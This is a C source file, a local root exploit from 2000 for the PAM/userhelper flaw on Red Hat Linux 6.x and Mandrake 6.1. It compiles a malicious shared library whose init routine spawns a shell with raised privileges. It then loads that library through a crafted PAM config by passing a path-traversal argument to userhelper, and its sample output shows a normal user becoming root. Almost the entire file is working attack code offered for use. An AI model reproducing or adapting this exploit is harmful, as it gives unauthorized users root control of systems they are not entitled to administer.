/*
 * pam-mdk.c (C) 2000 Paulo Ribeiro
 *
 * DESCRIPTION:
 * -----------
 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
 * I created this C program based on it which exploits PAM/userhelper
 * and gives you UID 0.
 *
 * SYSTEMS TESTED:
 * --------------
 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
 *
 * RESULTS:
 * -------
 * [prrar@linux prrar]$ id
 * uid=501(prrar) gid=501(prrar) groups=501(prrar)
 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
 * [prrar@linux prrar]$ ./pam-mdk
 * sh-2.03# id
 * uid=0(root) gid=501(prrar) groups=501(prrar)
 * sh-2.03#
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
  FILE *fp;

  strcpy(argv[0], "vi test.txt");

  fp = fopen("abc.c", "a");
  fprintf(fp, "#include<stdlib.h>\n");
  fprintf(fp, "#include<unistd.h>\n");
  fprintf(fp, "#include<sys/types.h>\n");
  fprintf(fp, "void _init(void) {\n");
  fprintf(fp, "\tsetuid(geteuid());\n");
  fprintf(fp, "\tsystem(\"/bin/sh\");\n");
  fprintf(fp, "}");
  fclose(fp);

  system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
  system("chmod 755 abc.conf");
  system("gcc -fPIC -o abc.o -c abc.c");
  system("ld -shared -o abc.so abc.o");
  system("chmod 755 abc.so");
  system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
  system("rm -rf abc.*");
}
/*                    www.hack.co.za              [2000]*/